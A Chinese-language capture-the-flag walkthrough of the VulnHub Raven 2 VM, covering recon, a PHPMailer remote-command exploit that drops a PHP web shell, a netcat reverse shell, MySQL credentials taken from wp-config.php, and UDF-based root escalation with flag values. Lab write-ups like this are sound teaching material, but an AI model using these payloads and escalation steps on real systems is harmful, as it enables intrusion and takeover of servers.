vulnhub靶机渗透[Raven-2]

Posted on 2020-03-26 Edited on 2020-08-17 In vulnhub walkthrough Views: Word count in article: 2.5k Reading time ≈ 9 mins.

名称

名称：Raven：2
发布日期：2018年11月9日

下载

Download: https://drive.google.com/open?id=1fXp4JS8ANOeClnK63LwgKXl56BqFJ23z
Download (Mirror): https://download.vulnhub.com/raven/Raven2.ova
Download (Torrent): https://download.vulnhub.com/raven/Raven2.ova.torrent

描述

Raven 2是中等级别的boot2root VM。有四个要获取的flag。多次攻击破坏之后，Raven Security采取了额外的措施来加固Web服务器，以防止黑客入侵。您是否仍然可以crush Raven？

信息收集

上nmap

root@kali:~# nmap -sn -v 192.168.56.*
Nmap scan report for 192.168.56.119
Host is up (0.00022s latency).
MAC Address: 08:00:27:A4:D6:91 (Oracle VirtualBox virtual NIC)

root@kali:~# nmap -sV -v -p- 192.168.56.119
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
111/tcp   open  rpcbind 2-4 (RPC #100000)
58132/tcp open  status  1 (RPC #100024)

root@kali:~# nmap -A -v -p 22,80,111,58132 192.168.56.119 --script=vuln -T4
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.56.119
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.56.119:80/
|     Form id: 
|     Form action: https://spondonit.us12.list-manage.com/subscribe/post?u=1462626880ade1ac87bd9c93a&id=92a4423d01
|     
|     Path: http://192.168.56.119:80/service.html
|     Form id: 
|     Form action: https://spondonit.us12.list-manage.com/subscribe/post?u=1462626880ade1ac87bd9c93a&id=92a4423d01
|     
|     Path: http://192.168.56.119:80/contact.php
|     Form id: myform
|     Form action: 
|     
|     Path: http://192.168.56.119:80/contact.php
|     Form id: 
|     Form action: https://spondonit.us12.list-manage.com/subscribe/post?u=1462626880ade1ac87bd9c93a&id=92a4423d01
|     
|     Path: http://192.168.56.119:80/index.html
|     Form id: 
|     Form action: https://spondonit.us12.list-manage.com/subscribe/post?u=1462626880ade1ac87bd9c93a&id=92a4423d01
|     
|     Path: http://192.168.56.119:80/wordpress/
|     Form id: search-form-5e7c8d72d17d7
|_    Form action: http://raven.local/wordpress/
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /wordpress/: Blog
|   /wordpress/wp-login.php: Wordpress login page.
|   /css/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
|   /img/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
|   /js/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
|   /manual/: Potentially interesting folder
|_  /vendor/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
|_http-server-header: Apache/2.4.10 (Debian)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
111/tcp   open  rpcbind 2-4 (RPC #100000)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          35360/udp6  status
|   100024  1          35599/tcp6  status
|   100024  1          46931/udp   status
|_  100024  1          58132/tcp   status
58132/tcp open  status  1 (RPC #100024)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)

上nikto

root@kali:~# nikto -C all -h 192.168.56.119
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-6694: /.DS_Store: Apache on Mac OSX will serve the .DS_Store file, which contains sensitive information. Configure Apache to ignore this file or upgrade to a newer version.
+ OSVDB-3233: /icons/README: Apache default file found.
+ Uncommon header 'link' found, with contents: <http://raven.local/wordpress/index.php/wp-json/>; rel="https://api.w.org/"
+ /wordpress/: A Wordpress installation was found.

网站使用wordpress搭建的，现在把raven.local添加到kali的/etc/hosts文件中和windows的hosts文件中。。。
用dirbuster扫描网站，使用medium字典，看看能得到什么。

Flag1

/vendor目录下有一个PATH文件，里面是第一个flag

1	flag1{a2c1f66d2b8051bd3a5874b5b6e43e21}

PHPMailer<5.2.18-远程命令执行

看起来该站点还使用PHPMailer 5.2.16。

5.2.18之前的PHPMailer版本易于执行远程命令

为此编写一个bash脚本，使用curl作为漏洞利用的主要驱动程序。

exploit.sh

TARGET=http://raven.local/contact.php

DOCROOT=/var/www/html
FILENAME=backdoor.php
LOCATION=$DOCROOT/$FILENAME

STATUS=$(curl -s \
              --data-urlencode "name=Hackerman" \
              --data-urlencode "email=\"hackerman\\\" -oQ/tmp -X$LOCATION blah\"@badguy.com" \
              --data-urlencode "message=<?php echo shell_exec(\$_GET['cmd']); ?>" \
              --data-urlencode "action=submit" \
              $TARGET | sed -r '146!d')

if grep 'instantiate' &>/dev/null <<<"$STATUS"; then
  echo "[+] Check ${LOCATION}?cmd=[shell command, e.g. id]"
else
  echo "[!] Exploit failed"
fi

执行脚本

1 2	root@kali:~/vulnhub/raven2# ./exploit.sh [+] Check /var/www/html/backdoor.php?cmd=[shell command, e.g. id]

之后成功运行命令如下图所示

1	view-source:http://raven.local/backdoor.php?cmd=whoami

低权限的shell

使用nc的-e选项反弹一个低权限的shell

1	view-source:http://raven.local/backdoor.php?cmd=nc%20192.168.56.102%205566%20-e%20/bin/bash

root@kali:~# nc -lvp 5566
listening on [any] 5566 ...
connect to [192.168.56.102] from raven.local [192.168.56.119] 44985
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@Raven:/var/www/html$ id                                              
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@Raven:/var/www/html$ whoami
whoami
www-data

现在获取了一个低权限的shell

Flag 2

第二个flag位于www-data的home目录中。

ww-data@Raven:/var/www$ ls
ls
flag2.txt  html
www-data@Raven:/var/www$ cat flag2.txt
cat flag2.txt
flag2{6a8ed560f0b5358ecf844108048eb337}

Flag 3

使用find命令寻找flag3

1
2
3

www-data@Raven:/var/www$ find / -type f -name 'flag[3-4].*' 2>/dev/null
find / -type f -name 'flag[3-4].*' 2>/dev/null
/var/www/html/wordpress/wp-content/uploads/2018/11/flag3.png

浏览器访问

1	http://raven.local/wordpress/wp-content/uploads/2018/11/flag3.png

到此得到第3个flag

提权

在对www-data的帐户进行枚举时，注意到MySQL以root身份运行。但是由于此版本的MySQL是5.5，所以不能使用流行的EDB-ID 1518用户定义函数或UDF。

root       921  0.0 10.1 552000 51240 ?        Sl   01:02   0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin --user=root --log-error=/var/log/mysql/error.log --pid-file=/var/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock --port=3306

www-data@Raven:/var/www$ dpkg -l | grep mysql
dpkg -l | grep mysql
ii  libdbd-mysql-perl              4.028-2+deb8u2                     amd64        Perl5 database interface to the MySQL database
ii  libmysqlclient18:amd64         5.5.60-0+deb8u1                    amd64        MySQL database client library
ii  mysql-client-5.5               5.5.60-0+deb8u1                    amd64        MySQL database client binaries
ii  mysql-common                   5.5.60-0+deb8u1                    all          MySQL database common files, e.g. /etc/mysql/my.cnf
ii  mysql-server                   5.5.60-0+deb8u1                    all          MySQL database server (metapackage depending on the latest version)
ii  mysql-server-5.5               5.5.60-0+deb8u1                    amd64        MySQL database server binaries and system database setup
ii  mysql-server-core-5.5          5.5.60-0+deb8u1                    amd64        MySQL database server binaries
ii  php5-mysqlnd                   5.6.36+dfsg-0+deb8u1               amd64        MySQL module for php5 (Native Driver)
ii  php5-mysqlnd-ms                1.6.0-1+b1                         amd64        MySQL replication and load balancing module for PHP

从wp-config.php文件中得到mysql的账号密码登录

www-data@Raven:/var/www/html$ grep -A3 -B3 root wordpress/wp-config.php
grep -A3 -B3 root wordpress/wp-config.php
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'R@v3nSecurity');

【提权方法1】：

有一个GitHub仓库UDF-Repository-for-MySQL，其中托管着许多5.5兼容的UDF，可以使用它们来完成提权。选择lib_mysqludf_sys，这是一个具有与操作系统交互功能的UDF库。

【提权方法2】：

MySQL利用远程root代码执行提权

更多信息参考MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662

因此，搜索UDF动态库漏洞利用程序，并在漏洞利用数据库中将其命名为“1518.c”。

exploit-1518

该漏洞利用是通过将原始C代码编译为“.so”文件，然后将其传输到受害计算机并利用MySQL漏洞来运行的。
第一步是对其进行编译。

root@kali:~/vulnhub/raven2/priviligesc# searchsploit 1518
MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library (2)           | exploits/linux/local/1518.c
root@kali:~/vulnhub/raven2/priviligesc# locate 1518.c
/root/vulnhub/raven1/1518.c
/usr/share/exploitdb/exploits/linux/local/1518.c
root@kali:~/vulnhub/raven2/priviligesc# cp /usr/share/exploitdb/exploits/linux/local/1518.c .
root@kali:~/vulnhub/raven2/priviligesc# ls
1518.c
root@kali:~/vulnhub/raven2/priviligesc# gcc -g -shared -Wl,-soname,1518.so -o 1518.so 1518.c -lc
root@kali:~/vulnhub/raven2/priviligesc# ls
1518.c  1518.so

将该“.so”文件传输到受害者计算机的/tmp目录下。

root@kali:~/vulnhub/raven2/priviligesc# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
192.168.56.1 - - [26/Mar/2020 03:52:25] "GET / HTTP/1.1" 200 -
192.168.56.1 - - [26/Mar/2020 03:52:33] "GET /1518.so HTTP/1.1" 200 -
192.168.56.119 - - [26/Mar/2020 03:52:50] "GET /1518.so HTTP/1.1" 200 -

www-data@Raven:/tmp$ wget http://192.168.56.102/1518.so
wget http://192.168.56.102/1518.so
converted 'http://192.168.56.102/1518.so' (ANSI_X3.4-1968) -> 'http://192.168.56.102/1518.so' (UTF-8)
--2020-03-27 02:52:49--  http://192.168.56.102/1518.so
Connecting to 192.168.56.102:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19104 (19K) [application/octet-stream]
Saving to: '1518.so'

1518.so             100%[=====================>]  18.66K  --.-KB/s   in 0s     

2020-03-27 02:52:49 (554 MB/s) - '1518.so' saved [19104/19104]

www-data@Raven:/tmp$ chmod 777 *
chmod 777 *

使用命令行登录mysql，利用漏洞和mysql命令行及so文件进行提权,如下所示

www-data@Raven:/tmp$ mysql -uroot -p'R@v3nSecurity'
mysql -uroot -p'R@v3nSecurity'
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 37
Server version: 5.5.60-0+deb8u1 (Debian)

Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> use mysql;
use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> create table foo(line blob);
insert into foo values(load_file('/tmp/1518.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';
create function do_system returns integer soname '1518.so';
select do_system('chmod u+s /usr/bin/find');create table foo(line blob);
insert into foo values(load_file('/tmp/1518.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';
create function do_system returns integer soname '1518.so';
Query OK, 0 rows affected (0.00 sec)

mysql> insert into foo values(load_file('/tmp/1518.so'));
Query OK, 1 row affected (0.00 sec)

mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';
Query OK, 1 row affected (0.10 sec)

mysql> create function do_system returns integer soname '1518.so';
Query OK, 0 rows affected (0.00 sec)

mysql> select do_system('chmod u+s /usr/bin/find');
<mod u+s /usr/bin/find');select do_system('chmod u+s /usr/bin/find');        
+--------------------------------------+
| do_system('chmod u+s /usr/bin/find') |
+--------------------------------------+
|                                    0 |
+--------------------------------------+
1 row in set (0.00 sec)

+--------------------------------------+
| do_system('chmod u+s /usr/bin/find') |
+--------------------------------------+
|                                    0 |
+--------------------------------------+
1 row in set (0.00 sec)

开始提权并读取最后的flag4

www-data@Raven:/tmp$ touch lucifer11
www-data@Raven:/tmp$ find lucifer11 -exec "whoami" \;
find lucifer11 -exec "whoami" \;
root
www-data@Raven:/tmp$ find lucifer11 -exec "id" \;
find lucifer11 -exec "id" \;
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
www-data@Raven:/tmp$ find lucifer11 -exec "/bin/sh" \;
find lucifer11 -exec "/bin/sh" \;
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
# whoami
whoami
root
# pwd
pwd
/tmp
# cd /root
cd /root
# ls
ls
flag4.txt
# cat flag4.txt
cat flag4.txt
  ___                   ___ ___ 
 | _ \__ ___ _____ _ _ |_ _|_ _|
 |   / _` \ V / -_) ' \ | | | | 
 |_|_\__,_|\_/\___|_||_|___|___|
                           
flag4{df2bc5e951d91581467bb9a2a8ff4425}

CONGRATULATIONS on successfully rooting RavenII

I hope you enjoyed this second interation of the Raven VM

Hit me up on Twitter and let me know what you thought: 

@mccannwj / wjmccann.github.io

完成提权并且成功的读取到了flag4

【提权方法3】：

还是利用Mysql udf提权，只不过这次用到setuid.c

setuid.c

#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
int main(void)
{
	setuid(0); setgid(0); system("/bin/bash");
}

下面是整个mysql语句的操作命令，步骤可以参照【提权方式2】

create table foo(line blob);
insert into foo values(load_file('/tmp/raptor_udf2.so'));
select * from foo into dumpfile '/usr/lib/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';
select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so'; 
select * from mysql.func;
select do_system('gcc -o /tmp/setuid /tmp/setuid.c');
select do_system('chmod u+s /tmp/setuid');
\! sh .
/setuid